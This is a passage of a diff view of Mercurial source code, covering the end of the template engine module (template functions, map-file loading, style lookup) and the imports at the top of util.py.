1006 @templatefunc('shortest(node, minlength=4)')
1007 def shortest(context, mapping, args):
1007 def shortest(context, mapping, args):
1008 """Obtain the shortest representation of
1008 """Obtain the shortest representation of
1009 a node."""
1009 a node."""
1010 if not (1 <= len(args) <= 2):
1010 if not (1 <= len(args) <= 2):
1011 # i18n: "shortest" is a keyword
1011 # i18n: "shortest" is a keyword
1012 raise error.ParseError(_("shortest() expects one or two arguments"))
1012 raise error.ParseError(_("shortest() expects one or two arguments"))
1013
1013
1014 node = evalstring(context, mapping, args[0])
1014 node = evalstring(context, mapping, args[0])
1015
1015
1016 minlength = 4
1016 minlength = 4
1017 if len(args) > 1:
1017 if len(args) > 1:
1018 minlength = evalinteger(context, mapping, args[1],
1018 minlength = evalinteger(context, mapping, args[1],
1019 # i18n: "shortest" is a keyword
1019 # i18n: "shortest" is a keyword
1020 _("shortest() expects an integer minlength"))
1020 _("shortest() expects an integer minlength"))
1021
1021
1022 # _partialmatch() of filtered changelog could take O(len(repo)) time,
1022 # _partialmatch() of filtered changelog could take O(len(repo)) time,
1023 # which would be unacceptably slow. so we look for hash collision in
1023 # which would be unacceptably slow. so we look for hash collision in
1024 # unfiltered space, which means some hashes may be slightly longer.
1024 # unfiltered space, which means some hashes may be slightly longer.
1025 cl = mapping['ctx']._repo.unfiltered().changelog
1025 cl = mapping['ctx']._repo.unfiltered().changelog
1026 def isvalid(test):
1026 def isvalid(test):
1027 try:
1027 try:
1028 if cl._partialmatch(test) is None:
1028 if cl._partialmatch(test) is None:
1029 return False
1029 return False
1030
1030
1031 try:
1031 try:
1032 i = int(test)
1032 i = int(test)
1033 # if we are a pure int, then starting with zero will not be
1033 # if we are a pure int, then starting with zero will not be
1034 # confused as a rev; or, obviously, if the int is larger than
1034 # confused as a rev; or, obviously, if the int is larger than
1035 # the value of the tip rev
1035 # the value of the tip rev
1036 if test[0] == '0' or i > len(cl):
1036 if test[0] == '0' or i > len(cl):
1037 return True
1037 return True
1038 return False
1038 return False
1039 except ValueError:
1039 except ValueError:
1040 return True
1040 return True
1041 except error.RevlogError:
1041 except error.RevlogError:
1042 return False
1042 return False
1043 except error.WdirUnsupported:
1043 except error.WdirUnsupported:
1044 # single 'ff...' match
1044 # single 'ff...' match
1045 return True
1045 return True
1046
1046
1047 shortest = node
1047 shortest = node
1048 startlength = max(6, minlength)
1048 startlength = max(6, minlength)
1049 length = startlength
1049 length = startlength
1050 while True:
1050 while True:
1051 test = node[:length]
1051 test = node[:length]
1052 if isvalid(test):
1052 if isvalid(test):
1053 shortest = test
1053 shortest = test
1054 if length == minlength or length > startlength:
1054 if length == minlength or length > startlength:
1055 return shortest
1055 return shortest
1056 length -= 1
1056 length -= 1
1057 else:
1057 else:
1058 length += 1
1058 length += 1
1059 if len(shortest) <= length:
1059 if len(shortest) <= length:
1060 return shortest
1060 return shortest
1061
1061
1062 @templatefunc('strip(text[, chars])')
1062 @templatefunc('strip(text[, chars])')
1063 def strip(context, mapping, args):
1063 def strip(context, mapping, args):
1064 """Strip characters from a string. By default,
1064 """Strip characters from a string. By default,
1065 strips all leading and trailing whitespace."""
1065 strips all leading and trailing whitespace."""
1066 if not (1 <= len(args) <= 2):
1066 if not (1 <= len(args) <= 2):
1067 # i18n: "strip" is a keyword
1067 # i18n: "strip" is a keyword
1068 raise error.ParseError(_("strip expects one or two arguments"))
1068 raise error.ParseError(_("strip expects one or two arguments"))
1069
1069
1070 text = evalstring(context, mapping, args[0])
1070 text = evalstring(context, mapping, args[0])
1071 if len(args) == 2:
1071 if len(args) == 2:
1072 chars = evalstring(context, mapping, args[1])
1072 chars = evalstring(context, mapping, args[1])
1073 return text.strip(chars)
1073 return text.strip(chars)
1074 return text.strip()
1074 return text.strip()
1075
1075
1076 @templatefunc('sub(pattern, replacement, expression)')
1076 @templatefunc('sub(pattern, replacement, expression)')
1077 def sub(context, mapping, args):
1077 def sub(context, mapping, args):
1078 """Perform text substitution
1078 """Perform text substitution
1079 using regular expressions."""
1079 using regular expressions."""
1080 if len(args) != 3:
1080 if len(args) != 3:
1081 # i18n: "sub" is a keyword
1081 # i18n: "sub" is a keyword
1082 raise error.ParseError(_("sub expects three arguments"))
1082 raise error.ParseError(_("sub expects three arguments"))
1083
1083
1084 pat = evalstring(context, mapping, args[0])
1084 pat = evalstring(context, mapping, args[0])
1085 rpl = evalstring(context, mapping, args[1])
1085 rpl = evalstring(context, mapping, args[1])
1086 src = evalstring(context, mapping, args[2])
1086 src = evalstring(context, mapping, args[2])
1087 try:
1087 try:
1088 patre = re.compile(pat)
1088 patre = re.compile(pat)
1089 except re.error:
1089 except re.error:
1090 # i18n: "sub" is a keyword
1090 # i18n: "sub" is a keyword
1091 raise error.ParseError(_("sub got an invalid pattern: %s") % pat)
1091 raise error.ParseError(_("sub got an invalid pattern: %s") % pat)
1092 try:
1092 try:
1093 yield patre.sub(rpl, src)
1093 yield patre.sub(rpl, src)
1094 except re.error:
1094 except re.error:
1095 # i18n: "sub" is a keyword
1095 # i18n: "sub" is a keyword
1096 raise error.ParseError(_("sub got an invalid replacement: %s") % rpl)
1096 raise error.ParseError(_("sub got an invalid replacement: %s") % rpl)
1097
1097
1098 @templatefunc('startswith(pattern, text)')
1098 @templatefunc('startswith(pattern, text)')
1099 def startswith(context, mapping, args):
1099 def startswith(context, mapping, args):
1100 """Returns the value from the "text" argument
1100 """Returns the value from the "text" argument
1101 if it begins with the content from the "pattern" argument."""
1101 if it begins with the content from the "pattern" argument."""
1102 if len(args) != 2:
1102 if len(args) != 2:
1103 # i18n: "startswith" is a keyword
1103 # i18n: "startswith" is a keyword
1104 raise error.ParseError(_("startswith expects two arguments"))
1104 raise error.ParseError(_("startswith expects two arguments"))
1105
1105
1106 patn = evalstring(context, mapping, args[0])
1106 patn = evalstring(context, mapping, args[0])
1107 text = evalstring(context, mapping, args[1])
1107 text = evalstring(context, mapping, args[1])
1108 if text.startswith(patn):
1108 if text.startswith(patn):
1109 return text
1109 return text
1110 return ''
1110 return ''
1111
1111
1112 @templatefunc('word(number, text[, separator])')
1112 @templatefunc('word(number, text[, separator])')
1113 def word(context, mapping, args):
1113 def word(context, mapping, args):
1114 """Return the nth word from a string."""
1114 """Return the nth word from a string."""
1115 if not (2 <= len(args) <= 3):
1115 if not (2 <= len(args) <= 3):
1116 # i18n: "word" is a keyword
1116 # i18n: "word" is a keyword
1117 raise error.ParseError(_("word expects two or three arguments, got %d")
1117 raise error.ParseError(_("word expects two or three arguments, got %d")
1118 % len(args))
1118 % len(args))
1119
1119
1120 num = evalinteger(context, mapping, args[0],
1120 num = evalinteger(context, mapping, args[0],
1121 # i18n: "word" is a keyword
1121 # i18n: "word" is a keyword
1122 _("word expects an integer index"))
1122 _("word expects an integer index"))
1123 text = evalstring(context, mapping, args[1])
1123 text = evalstring(context, mapping, args[1])
1124 if len(args) == 3:
1124 if len(args) == 3:
1125 splitter = evalstring(context, mapping, args[2])
1125 splitter = evalstring(context, mapping, args[2])
1126 else:
1126 else:
1127 splitter = None
1127 splitter = None
1128
1128
1129 tokens = text.split(splitter)
1129 tokens = text.split(splitter)
1130 if num >= len(tokens) or num < -len(tokens):
1130 if num >= len(tokens) or num < -len(tokens):
1131 return ''
1131 return ''
1132 else:
1132 else:
1133 return tokens[num]
1133 return tokens[num]
1134
1134
1135 # methods to interpret function arguments or inner expressions (e.g. {_(x)})
1135 # methods to interpret function arguments or inner expressions (e.g. {_(x)})
1136 exprmethods = {
1136 exprmethods = {
1137 "integer": lambda e, c: (runinteger, e[1]),
1137 "integer": lambda e, c: (runinteger, e[1]),
1138 "string": lambda e, c: (runstring, e[1]),
1138 "string": lambda e, c: (runstring, e[1]),
1139 "symbol": lambda e, c: (runsymbol, e[1]),
1139 "symbol": lambda e, c: (runsymbol, e[1]),
1140 "template": buildtemplate,
1140 "template": buildtemplate,
1141 "group": lambda e, c: compileexp(e[1], c, exprmethods),
1141 "group": lambda e, c: compileexp(e[1], c, exprmethods),
1142 # ".": buildmember,
1142 # ".": buildmember,
1143 "|": buildfilter,
1143 "|": buildfilter,
1144 "%": buildmap,
1144 "%": buildmap,
1145 "func": buildfunc,
1145 "func": buildfunc,
1146 "keyvalue": buildkeyvaluepair,
1146 "keyvalue": buildkeyvaluepair,
1147 "+": lambda e, c: buildarithmetic(e, c, lambda a, b: a + b),
1147 "+": lambda e, c: buildarithmetic(e, c, lambda a, b: a + b),
1148 "-": lambda e, c: buildarithmetic(e, c, lambda a, b: a - b),
1148 "-": lambda e, c: buildarithmetic(e, c, lambda a, b: a - b),
1149 "negate": buildnegate,
1149 "negate": buildnegate,
1150 "*": lambda e, c: buildarithmetic(e, c, lambda a, b: a * b),
1150 "*": lambda e, c: buildarithmetic(e, c, lambda a, b: a * b),
1151 "/": lambda e, c: buildarithmetic(e, c, lambda a, b: a // b),
1151 "/": lambda e, c: buildarithmetic(e, c, lambda a, b: a // b),
1152 }
1152 }
1153
1153
1154 # methods to interpret top-level template (e.g. {x}, {x|_}, {x % "y"})
1154 # methods to interpret top-level template (e.g. {x}, {x|_}, {x % "y"})
1155 methods = exprmethods.copy()
1155 methods = exprmethods.copy()
1156 methods["integer"] = exprmethods["symbol"] # '{1}' as variable
1156 methods["integer"] = exprmethods["symbol"] # '{1}' as variable
1157
1157
1158 class _aliasrules(parser.basealiasrules):
1158 class _aliasrules(parser.basealiasrules):
1159 """Parsing and expansion rule set of template aliases"""
1159 """Parsing and expansion rule set of template aliases"""
1160 _section = _('template alias')
1160 _section = _('template alias')
1161 _parse = staticmethod(_parseexpr)
1161 _parse = staticmethod(_parseexpr)
1162
1162
1163 @staticmethod
1163 @staticmethod
1164 def _trygetfunc(tree):
1164 def _trygetfunc(tree):
1165 """Return (name, args) if tree is func(...) or ...|filter; otherwise
1165 """Return (name, args) if tree is func(...) or ...|filter; otherwise
1166 None"""
1166 None"""
1167 if tree[0] == 'func' and tree[1][0] == 'symbol':
1167 if tree[0] == 'func' and tree[1][0] == 'symbol':
1168 return tree[1][1], getlist(tree[2])
1168 return tree[1][1], getlist(tree[2])
1169 if tree[0] == '|' and tree[2][0] == 'symbol':
1169 if tree[0] == '|' and tree[2][0] == 'symbol':
1170 return tree[2][1], [tree[1]]
1170 return tree[2][1], [tree[1]]
1171
1171
1172 def expandaliases(tree, aliases):
1172 def expandaliases(tree, aliases):
1173 """Return new tree of aliases are expanded"""
1173 """Return new tree of aliases are expanded"""
1174 aliasmap = _aliasrules.buildmap(aliases)
1174 aliasmap = _aliasrules.buildmap(aliases)
1175 return _aliasrules.expand(aliasmap, tree)
1175 return _aliasrules.expand(aliasmap, tree)
1176
1176
1177 # template engine
1177 # template engine
1178
1178
1179 stringify = templatefilters.stringify
1179 stringify = templatefilters.stringify
1180
1180
1181 def _flatten(thing):
1181 def _flatten(thing):
1182 '''yield a single stream from a possibly nested set of iterators'''
1182 '''yield a single stream from a possibly nested set of iterators'''
1183 thing = templatekw.unwraphybrid(thing)
1183 thing = templatekw.unwraphybrid(thing)
1184 if isinstance(thing, bytes):
1184 if isinstance(thing, bytes):
1185 yield thing
1185 yield thing
1186 elif thing is None:
1186 elif thing is None:
1187 pass
1187 pass
1188 elif not util.safehasattr(thing, '__iter__'):
1188 elif not util.safehasattr(thing, '__iter__'):
1189 yield pycompat.bytestr(thing)
1189 yield pycompat.bytestr(thing)
1190 else:
1190 else:
1191 for i in thing:
1191 for i in thing:
1192 i = templatekw.unwraphybrid(i)
1192 i = templatekw.unwraphybrid(i)
1193 if isinstance(i, bytes):
1193 if isinstance(i, bytes):
1194 yield i
1194 yield i
1195 elif i is None:
1195 elif i is None:
1196 pass
1196 pass
1197 elif not util.safehasattr(i, '__iter__'):
1197 elif not util.safehasattr(i, '__iter__'):
1198 yield pycompat.bytestr(i)
1198 yield pycompat.bytestr(i)
1199 else:
1199 else:
1200 for j in _flatten(i):
1200 for j in _flatten(i):
1201 yield j
1201 yield j
1202
1202
1203 def unquotestring(s):
1203 def unquotestring(s):
1204 '''unwrap quotes if any; otherwise returns unmodified string'''
1204 '''unwrap quotes if any; otherwise returns unmodified string'''
1205 if len(s) < 2 or s[0] not in "'\"" or s[0] != s[-1]:
1205 if len(s) < 2 or s[0] not in "'\"" or s[0] != s[-1]:
1206 return s
1206 return s
1207 return s[1:-1]
1207 return s[1:-1]
1208
1208
1209 class engine(object):
1209 class engine(object):
1210 '''template expansion engine.
1210 '''template expansion engine.
1211
1211
1212 template expansion works like this. a map file contains key=value
1212 template expansion works like this. a map file contains key=value
1213 pairs. if value is quoted, it is treated as string. otherwise, it
1213 pairs. if value is quoted, it is treated as string. otherwise, it
1214 is treated as name of template file.
1214 is treated as name of template file.
1215
1215
1216 templater is asked to expand a key in map. it looks up key, and
1216 templater is asked to expand a key in map. it looks up key, and
1217 looks for strings like this: {foo}. it expands {foo} by looking up
1217 looks for strings like this: {foo}. it expands {foo} by looking up
1218 foo in map, and substituting it. expansion is recursive: it stops
1218 foo in map, and substituting it. expansion is recursive: it stops
1219 when there is no more {foo} to replace.
1219 when there is no more {foo} to replace.
1220
1220
1221 expansion also allows formatting and filtering.
1221 expansion also allows formatting and filtering.
1222
1222
1223 format uses key to expand each item in list. syntax is
1223 format uses key to expand each item in list. syntax is
1224 {key%format}.
1224 {key%format}.
1225
1225
1226 filter uses function to transform value. syntax is
1226 filter uses function to transform value. syntax is
1227 {key|filter1|filter2|...}.'''
1227 {key|filter1|filter2|...}.'''
1228
1228
1229 def __init__(self, loader, filters=None, defaults=None, aliases=()):
1229 def __init__(self, loader, filters=None, defaults=None, aliases=()):
1230 self._loader = loader
1230 self._loader = loader
1231 if filters is None:
1231 if filters is None:
1232 filters = {}
1232 filters = {}
1233 self._filters = filters
1233 self._filters = filters
1234 if defaults is None:
1234 if defaults is None:
1235 defaults = {}
1235 defaults = {}
1236 self._defaults = defaults
1236 self._defaults = defaults
1237 self._aliasmap = _aliasrules.buildmap(aliases)
1237 self._aliasmap = _aliasrules.buildmap(aliases)
1238 self._cache = {} # key: (func, data)
1238 self._cache = {} # key: (func, data)
1239
1239
1240 def _load(self, t):
1240 def _load(self, t):
1241 '''load, parse, and cache a template'''
1241 '''load, parse, and cache a template'''
1242 if t not in self._cache:
1242 if t not in self._cache:
1243 # put poison to cut recursion while compiling 't'
1243 # put poison to cut recursion while compiling 't'
1244 self._cache[t] = (_runrecursivesymbol, t)
1244 self._cache[t] = (_runrecursivesymbol, t)
1245 try:
1245 try:
1246 x = parse(self._loader(t))
1246 x = parse(self._loader(t))
1247 if self._aliasmap:
1247 if self._aliasmap:
1248 x = _aliasrules.expand(self._aliasmap, x)
1248 x = _aliasrules.expand(self._aliasmap, x)
1249 self._cache[t] = compileexp(x, self, methods)
1249 self._cache[t] = compileexp(x, self, methods)
1250 except: # re-raises
1250 except: # re-raises
1251 del self._cache[t]
1251 del self._cache[t]
1252 raise
1252 raise
1253 return self._cache[t]
1253 return self._cache[t]
1254
1254
1255 def process(self, t, mapping):
1255 def process(self, t, mapping):
1256 '''Perform expansion. t is name of map element to expand.
1256 '''Perform expansion. t is name of map element to expand.
1257 mapping contains added elements for use during expansion. Is a
1257 mapping contains added elements for use during expansion. Is a
1258 generator.'''
1258 generator.'''
1259 func, data = self._load(t)
1259 func, data = self._load(t)
1260 return _flatten(func(self, mapping, data))
1260 return _flatten(func(self, mapping, data))
1261
1261
1262 engines = {'default': engine}
1262 engines = {'default': engine}
1263
1263
1264 def stylelist():
1264 def stylelist():
1265 paths = templatepaths()
1265 paths = templatepaths()
1266 if not paths:
1266 if not paths:
1267 return _('no templates found, try `hg debuginstall` for more info')
1267 return _('no templates found, try `hg debuginstall` for more info')
1268 dirlist = os.listdir(paths[0])
1268 dirlist = os.listdir(paths[0])
1269 stylelist = []
1269 stylelist = []
1270 for file in dirlist:
1270 for file in dirlist:
1271 split = file.split(".")
1271 split = file.split(".")
1272 if split[-1] in ('orig', 'rej'):
1272 if split[-1] in ('orig', 'rej'):
1273 continue
1273 continue
1274 if split[0] == "map-cmdline":
1274 if split[0] == "map-cmdline":
1275 stylelist.append(split[1])
1275 stylelist.append(split[1])
1276 return ", ".join(sorted(stylelist))
1276 return ", ".join(sorted(stylelist))
1277
1277
1278 def _readmapfile(mapfile):
1278 def _readmapfile(mapfile):
1279 """Load template elements from the given map file"""
1279 """Load template elements from the given map file"""
1280 if not os.path.exists(mapfile):
1280 if not os.path.exists(mapfile):
1281 raise error.Abort(_("style '%s' not found") % mapfile,
1281 raise error.Abort(_("style '%s' not found") % mapfile,
1282 hint=_("available styles: %s") % stylelist())
1282 hint=_("available styles: %s") % stylelist())
1283
1283
1284 base = os.path.dirname(mapfile)
1284 base = os.path.dirname(mapfile)
1285 conf = config.config(includepaths=templatepaths())
1285 conf = config.config(includepaths=templatepaths())
1286 conf.read(mapfile)
1286 conf.read(mapfile)
1287
1287
1288 cache = {}
1288 cache = {}
1289 tmap = {}
1289 tmap = {}
1290 for key, val in conf[''].items():
1290 for key, val in conf[''].items():
1291 if not val:
1291 if not val:
1292 raise error.ParseError(_('missing value'), conf.source('', key))
1292 raise error.ParseError(_('missing value'), conf.source('', key))
1293 if val[0] in "'\"":
1293 if val[0] in "'\"":
1294 if val[0] != val[-1]:
1294 if val[0] != val[-1]:
1295 raise error.ParseError(_('unmatched quotes'),
1295 raise error.ParseError(_('unmatched quotes'),
1296 conf.source('', key))
1296 conf.source('', key))
1297 cache[key] = unquotestring(val)
1297 cache[key] = unquotestring(val)
1298 elif key == "__base__":
1298 elif key == "__base__":
1299 # treat as a pointer to a base class for this style
1299 # treat as a pointer to a base class for this style
1300 path = util.normpath(os.path.join(base, val))
1300 path = util.normpath(os.path.join(base, val))
1301
1301
1302 # fallback check in template paths
1302 # fallback check in template paths
1303 if not os.path.exists(path):
1303 if not os.path.exists(path):
1304 for p in templatepaths():
1304 for p in templatepaths():
1305 p2 = util.normpath(os.path.join(p, val))
1305 p2 = util.normpath(os.path.join(p, val))
1306 if os.path.isfile(p2):
1306 if os.path.isfile(p2):
1307 path = p2
1307 path = p2
1308 break
1308 break
1309 p3 = util.normpath(os.path.join(p2, "map"))
1309 p3 = util.normpath(os.path.join(p2, "map"))
1310 if os.path.isfile(p3):
1310 if os.path.isfile(p3):
1311 path = p3
1311 path = p3
1312 break
1312 break
1313
1313
1314 bcache, btmap = _readmapfile(path)
1314 bcache, btmap = _readmapfile(path)
1315 for k in bcache:
1315 for k in bcache:
1316 if k not in cache:
1316 if k not in cache:
1317 cache[k] = bcache[k]
1317 cache[k] = bcache[k]
1318 for k in btmap:
1318 for k in btmap:
1319 if k not in tmap:
1319 if k not in tmap:
1320 tmap[k] = btmap[k]
1320 tmap[k] = btmap[k]
1321 else:
1321 else:
1322 val = 'default', val
1322 val = 'default', val
1323 if ':' in val[1]:
1323 if ':' in val[1]:
1324 val = val[1].split(':', 1)
1324 val = val[1].split(':', 1)
1325 tmap[key] = val[0], os.path.join(base, val[1])
1325 tmap[key] = val[0], os.path.join(base, val[1])
1326 return cache, tmap
1326 return cache, tmap
1327
1327
1328 class TemplateNotFound(error.Abort):
1328 class TemplateNotFound(error.Abort):
1329 pass
1329 pass
1330
1330
1331 class templater(object):
1331 class templater(object):
1332
1332
1333 def __init__(self, filters=None, defaults=None, cache=None, aliases=(),
1333 def __init__(self, filters=None, defaults=None, cache=None, aliases=(),
1334 minchunk=1024, maxchunk=65536):
1334 minchunk=1024, maxchunk=65536):
1335 '''set up template engine.
1335 '''set up template engine.
1336 filters is dict of functions. each transforms a value into another.
1336 filters is dict of functions. each transforms a value into another.
1337 defaults is dict of default map definitions.
1337 defaults is dict of default map definitions.
1338 aliases is list of alias (name, replacement) pairs.
1338 aliases is list of alias (name, replacement) pairs.
1339 '''
1339 '''
1340 if filters is None:
1340 if filters is None:
1341 filters = {}
1341 filters = {}
1342 if defaults is None:
1342 if defaults is None:
1343 defaults = {}
1343 defaults = {}
1344 if cache is None:
1344 if cache is None:
1345 cache = {}
1345 cache = {}
1346 self.cache = cache.copy()
1346 self.cache = cache.copy()
1347 self.map = {}
1347 self.map = {}
1348 self.filters = templatefilters.filters.copy()
1348 self.filters = templatefilters.filters.copy()
1349 self.filters.update(filters)
1349 self.filters.update(filters)
1350 self.defaults = defaults
1350 self.defaults = defaults
1351 self._aliases = aliases
1351 self._aliases = aliases
1352 self.minchunk, self.maxchunk = minchunk, maxchunk
1352 self.minchunk, self.maxchunk = minchunk, maxchunk
1353 self.ecache = {}
1353 self.ecache = {}
1354
1354
1355 @classmethod
1355 @classmethod
1356 def frommapfile(cls, mapfile, filters=None, defaults=None, cache=None,
1356 def frommapfile(cls, mapfile, filters=None, defaults=None, cache=None,
1357 minchunk=1024, maxchunk=65536):
1357 minchunk=1024, maxchunk=65536):
1358 """Create templater from the specified map file"""
1358 """Create templater from the specified map file"""
1359 t = cls(filters, defaults, cache, [], minchunk, maxchunk)
1359 t = cls(filters, defaults, cache, [], minchunk, maxchunk)
1360 cache, tmap = _readmapfile(mapfile)
1360 cache, tmap = _readmapfile(mapfile)
1361 t.cache.update(cache)
1361 t.cache.update(cache)
1362 t.map = tmap
1362 t.map = tmap
1363 return t
1363 return t
1364
1364
1365 def __contains__(self, key):
1365 def __contains__(self, key):
1366 return key in self.cache or key in self.map
1366 return key in self.cache or key in self.map
1367
1367
1368 def load(self, t):
1368 def load(self, t):
1369 '''Get the template for the given template name. Use a local cache.'''
1369 '''Get the template for the given template name. Use a local cache.'''
1370 if t not in self.cache:
1370 if t not in self.cache:
1371 try:
1371 try:
1372 self.cache[t] = util.readfile(self.map[t][1])
1372 self.cache[t] = util.readfile(self.map[t][1])
1373 except KeyError as inst:
1373 except KeyError as inst:
1374 raise TemplateNotFound(_('"%s" not in template map') %
1374 raise TemplateNotFound(_('"%s" not in template map') %
1375 inst.args[0])
1375 inst.args[0])
1376 except IOError as inst:
1376 except IOError as inst:
1377 raise IOError(inst.args[0], _('template file %s: %s') %
1377 raise IOError(inst.args[0], _('template file %s: %s') %
1378 (self.map[t][1], inst.args[1]))
1378 (self.map[t][1], inst.args[1]))
1379 return self.cache[t]
1379 return self.cache[t]
1380
1380
1381 def render(self, mapping):
1381 def render(self, mapping):
1382 """Render the default unnamed template and return result as string"""
1382 """Render the default unnamed template and return result as string"""
1383 return stringify(self('', **mapping))
1383 return stringify(self('', **mapping))
1384
1384
1385 def __call__(self, t, **mapping):
1385 def __call__(self, t, **mapping):
1386 mapping = pycompat.byteskwargs(mapping)
1386 mapping = pycompat.byteskwargs(mapping)
1387 ttype = t in self.map and self.map[t][0] or 'default'
1387 ttype = t in self.map and self.map[t][0] or 'default'
1388 if ttype not in self.ecache:
1388 if ttype not in self.ecache:
1389 try:
1389 try:
1390 ecls = engines[ttype]
1390 ecls = engines[ttype]
1391 except KeyError:
1391 except KeyError:
1392 raise error.Abort(_('invalid template engine: %s') % ttype)
1392 raise error.Abort(_('invalid template engine: %s') % ttype)
1393 self.ecache[ttype] = ecls(self.load, self.filters, self.defaults,
1393 self.ecache[ttype] = ecls(self.load, self.filters, self.defaults,
1394 self._aliases)
1394 self._aliases)
1395 proc = self.ecache[ttype]
1395 proc = self.ecache[ttype]
1396
1396
1397 stream = proc.process(t, mapping)
1397 stream = proc.process(t, mapping)
1398 if self.minchunk:
1398 if self.minchunk:
1399 stream = util.increasingchunks(stream, min=self.minchunk,
1399 stream = util.increasingchunks(stream, min=self.minchunk,
1400 max=self.maxchunk)
1400 max=self.maxchunk)
1401 return stream
1401 return stream
1402
1402
1403 def templatepaths():
1403 def templatepaths():
1404 '''return locations used for template files.'''
1404 '''return locations used for template files.'''
1405 pathsrel = ['templates']
1405 pathsrel = ['templates']
1406 paths = [os.path.normpath(os.path.join(util.datapath, f))
1406 paths = [os.path.normpath(os.path.join(util.datapath, f))
1407 for f in pathsrel]
1407 for f in pathsrel]
1408 return [p for p in paths if os.path.isdir(p)]
1408 return [p for p in paths if os.path.isdir(p)]
1409
1409
1410 def templatepath(name):
1410 def templatepath(name):
1411 '''return location of template file. returns None if not found.'''
1411 '''return location of template file. returns None if not found.'''
1412 for p in templatepaths():
1412 for p in templatepaths():
1413 f = os.path.join(p, name)
1413 f = os.path.join(p, name)
1414 if os.path.exists(f):
1414 if os.path.exists(f):
1415 return f
1415 return f
1416 return None
1416 return None
1417
1417
1418 def stylemap(styles, paths=None):
1418 def stylemap(styles, paths=None):
1419 """Return path to mapfile for a given style.
1419 """Return path to mapfile for a given style.
1420
1420
1421 Searches mapfile in the following locations:
1421 Searches mapfile in the following locations:
1422 1. templatepath/style/map
1422 1. templatepath/style/map
1423 2. templatepath/map-style
1423 2. templatepath/map-style
1424 3. templatepath/map
1424 3. templatepath/map
1425 """
1425 """
1426
1426
1427 if paths is None:
1427 if paths is None:
1428 paths = templatepaths()
1428 paths = templatepaths()
1429 elif isinstance(paths, str):
1429 elif isinstance(paths, str):
1430 paths = [paths]
1430 paths = [paths]
1431
1431
1432 if isinstance(styles, str):
1432 if isinstance(styles, str):
1433 styles = [styles]
1433 styles = [styles]
1434
1434
1435 for style in styles:
1435 for style in styles:
1436 # only plain name is allowed to honor template paths
1436 # only plain name is allowed to honor template paths
1437 if (not style
1437 if (not style
1438 or style in (os.curdir, os.pardir)
1438 or style in (os.curdir, os.pardir)
1439 or pycompat.ossep in style
1439 or pycompat.ossep in style
1440 or pycompat.osaltsep and pycompat.osaltsep in style):
1440 or pycompat.osaltsep and pycompat.osaltsep in style):
1441 continue
1441 continue
1442 locations = [os.path.join(style, 'map'), 'map-' + style]
1442 locations = [os.path.join(style, 'map'), 'map-' + style]
1443 locations.append('map')
1443 locations.append('map')
1444
1444
1445 for path in paths:
1445 for path in paths:
1446 for location in locations:
1446 for location in locations:
1447 mapfile = os.path.join(path, location)
1447 mapfile = os.path.join(path, location)
1448 if os.path.isfile(mapfile):
1448 if os.path.isfile(mapfile):
1449 return style, mapfile
1449 return style, mapfile
1450
1450
1451 raise RuntimeError("No hgweb templates found in %r" % paths)
1451 raise RuntimeError("No hgweb templates found in %r" % paths)
1452
1452
1453 def loadfunction(ui, extname, registrarobj):
1453 def loadfunction(ui, extname, registrarobj):
1454 """Load template function from specified registrarobj
1454 """Load template function from specified registrarobj
1455 """
1455 """
1456 for name, func in registrarobj._table.iteritems():
1456 for name, func in registrarobj._table.iteritems():
1457 funcs[name] = func
1457 funcs[name] = func
1458
1458
1459 # tell hggettext to extract docstrings from these functions:
1459 # tell hggettext to extract docstrings from these functions:
1460 i18nfunctions = funcs.values()
1460 i18nfunctions = funcs.values()
@@ -1,3769 +1,3769 b''
1 # util.py - Mercurial utility functions and platform specific implementations
1 # util.py - Mercurial utility functions and platform specific implementations
2 #
2 #
3 # Copyright 2005 K. Thananchayan <thananck@yahoo.com>
3 # Copyright 2005 K. Thananchayan <thananck@yahoo.com>
4 # Copyright 2005-2007 Matt Mackall <mpm@selenic.com>
4 # Copyright 2005-2007 Matt Mackall <mpm@selenic.com>
5 # Copyright 2006 Vadim Gelfer <vadim.gelfer@gmail.com>
5 # Copyright 2006 Vadim Gelfer <vadim.gelfer@gmail.com>
6 #
6 #
7 # This software may be used and distributed according to the terms of the
7 # This software may be used and distributed according to the terms of the
8 # GNU General Public License version 2 or any later version.
8 # GNU General Public License version 2 or any later version.
9
9
10 """Mercurial utility functions and platform specific implementations.
10 """Mercurial utility functions and platform specific implementations.
11
11
12 This contains helper routines that are independent of the SCM core and
12 This contains helper routines that are independent of the SCM core and
13 hide platform-specific details from the core.
13 hide platform-specific details from the core.
14 """
14 """
15
15
16 from __future__ import absolute_import, print_function
16 from __future__ import absolute_import, print_function
17
17
18 import abc
18 import abc
19 import bz2
19 import bz2
20 import calendar
20 import calendar
21 import codecs
21 import codecs
22 import collections
22 import collections
23 import contextlib
23 import contextlib
24 import datetime
24 import datetime
25 import errno
25 import errno
26 import gc
26 import gc
27 import hashlib
27 import hashlib
28 import imp
28 import imp
29 import os
29 import os
30 import platform as pyplatform
30 import platform as pyplatform
31 import re as remod
31 import re as remod
32 import shutil
32 import shutil
33 import signal
33 import signal
34 import socket
34 import socket
35 import stat
35 import stat
36 import string
36 import string
37 import subprocess
37 import subprocess
38 import sys
38 import sys
39 import tempfile
39 import tempfile
40 import textwrap
40 import textwrap
41 import time
41 import time
42 import traceback
42 import traceback
43 import warnings
43 import warnings
44 import zlib
44 import zlib
45
45
46 from . import (
46 from . import (
47 encoding,
47 encoding,
48 error,
48 error,
49 i18n,
49 i18n,
50 policy,
50 policy,
51 pycompat,
51 pycompat,
52 )
52 )
53
53
54 base85 = policy.importmod(r'base85')
54 base85 = policy.importmod(r'base85')
55 osutil = policy.importmod(r'osutil')
55 osutil = policy.importmod(r'osutil')
56 parsers = policy.importmod(r'parsers')
56 parsers = policy.importmod(r'parsers')
57
57
58 b85decode = base85.b85decode
58 b85decode = base85.b85decode
59 b85encode = base85.b85encode
59 b85encode = base85.b85encode
60
60
61 cookielib = pycompat.cookielib
61 cookielib = pycompat.cookielib
62 empty = pycompat.empty
62 empty = pycompat.empty
63 httplib = pycompat.httplib
63 httplib = pycompat.httplib
64 httpserver = pycompat.httpserver
64 httpserver = pycompat.httpserver
65 pickle = pycompat.pickle
65 pickle = pycompat.pickle
66 queue = pycompat.queue
66 queue = pycompat.queue
67 socketserver = pycompat.socketserver
67 socketserver = pycompat.socketserver
68 stderr = pycompat.stderr
68 stderr = pycompat.stderr
69 stdin = pycompat.stdin
69 stdin = pycompat.stdin
70 stdout = pycompat.stdout
70 stdout = pycompat.stdout
71 stringio = pycompat.stringio
71 stringio = pycompat.stringio
72 urlerr = pycompat.urlerr
72 urlerr = pycompat.urlerr
73 urlreq = pycompat.urlreq
73 urlreq = pycompat.urlreq
74 xmlrpclib = pycompat.xmlrpclib
